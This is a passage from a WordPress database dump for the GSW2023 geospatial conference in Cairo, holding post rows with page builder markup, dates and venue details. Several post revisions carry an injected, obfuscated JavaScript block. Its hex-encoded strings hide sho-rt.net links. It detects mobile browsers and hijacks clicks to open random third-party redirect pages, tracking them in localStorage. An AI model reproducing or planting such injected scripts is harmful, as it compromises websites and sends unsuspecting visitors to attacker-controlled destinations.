)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Underwater Mapping Workshop : Geospatial techniques for underwater documentation, mapping and monitoring</strong>','','inherit','closed','closed','','3334-revision-v1','','','2022-11-23 06:24:42','2022-11-23 06:24:42','',3334,'https://gsw2023.com/?p=3351',0,'revision','',0),
(3352,1,'2022-11-23 06:27:42','2022-11-23 06:27:42','<p>[vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" image_paddings=\"15px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"35, 36, 37, 38, 40, 41, 42, 45, 46, 47, 48, 49, 50, 51, 53, 43, 44, 52, 54, 55, 56, 57, 58, 59, 60\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','International Science Committee','','inherit','closed','closed','','2876-revision-v1','','','2022-11-23 06:27:42','2022-11-23 06:27:42','',2876,'https://gsw2023.com/?p=3352',0,'revision','',0),
(3353,1,'2022-11-25 19:36:07','2022-11-25 19:36:07','','main11','','inherit','open','closed','','main11','','','2022-11-25 19:36:07','2022-11-25 19:36:07','',3066,'https://gsw2023.com/wp-content/uploads/2022/11/main11.jpg',0,'attachment','image/jpeg',0),
(3354,1,'2022-11-25 19:50:13','2022-11-25 19:50:13','','main1','','inherit','open','closed','','main1','','','2022-11-25 19:50:13','2022-11-25 19:50:13','',3066,'https://gsw2023.com/wp-content/uploads/2022/11/main1.jpg',0,'attachment','image/jpeg',0);
INSERT INTO `dnctiavkr_posts` VALUES
(3355,1,'2022-11-25 20:27:11','2022-11-25 20:27:11','<p>[vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]</p>\r\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n<p>[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]</p>\r\n<h3></h3>\r\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1668205634615{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][vc_column_inner][vc_column_text]</p>\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n<p>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1668021106220{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668020734563{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPAER:SOON[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>INTERCONTINENTAL CAIRO SEMIRAMIS</strong></h4>\r\n<p>&nbsp;</p>\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>MORE INFORMATION</strong></h4>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Office of the Vice President of the Academy for Graduate Studies and Scientific Research</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps 